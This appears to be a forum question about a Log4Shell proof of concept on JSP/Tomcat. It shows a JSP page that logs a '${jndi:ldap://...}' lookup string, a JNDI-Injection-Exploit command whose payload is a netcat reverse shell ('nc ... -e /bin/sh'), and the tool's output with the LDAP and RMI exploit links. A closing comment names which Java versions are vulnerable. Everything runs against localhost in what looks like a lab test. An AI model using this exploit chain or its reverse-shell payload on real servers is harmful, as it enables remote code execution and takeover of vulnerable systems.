# Log4Shell POC jsp/tomcat

Tags: java, security, jsp, tomcat, log4j2

I'm trying to make a simple POC with JSP/tomcat...

On one side : the JSP part (with log4j-core/log4j-api)

```
<%@ page import="org.apache.logging.log4j.Logger" %>
<%@ page import="org.apache.logging.log4j.LogManager" %>
<html>
    <head>
        <title>Demonstration log4j usage in jsp</title>
    </head>
    <body>
<%
Logger logger = LogManager.getLogger("Elt");
logger.error("${jndi:ldap://127.0.0.1:1389/tf2ryx}");

%>
    </body>
</html>
```

On other side:

```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 127.0.0.1 9999 -e /bin/sh" -A 127.0.0.1
[ADDRESS] >> 127.0.0.1
[COMMAND] >> nc 127.0.0.1 9999 -e /bin/sh
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/00epyj
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/qamx3t
ldap://127.0.0.1:1389/qamx3t
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/tf2ryx
ldap://127.0.0.1:1389/tf2ryx

----------------------------Server Log----------------------------
2021-12-23 06:54:23 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2021-12-23 06:54:23 [RMISERVER]  >> Listening on 0.0.0.0:1099
2021-12-23 06:54:23 [LDAPSERVER] >> Listening on 0.0.0.0:1389
2021-12-23 06:54:39 [LDAPSERVER] >> Send LDAP reference result for tf2ryx redirecting to http://127.0.0.1:8180/ExecTemplateJDK8.class
```

- First call to ldap works.
- But Redirection to bad class not.

I don't know where is my mistake.

Comment: Java version s the key. 
8.181.13-r0 ... log4shell [OK]
8.275.01-r0 ... [NOK]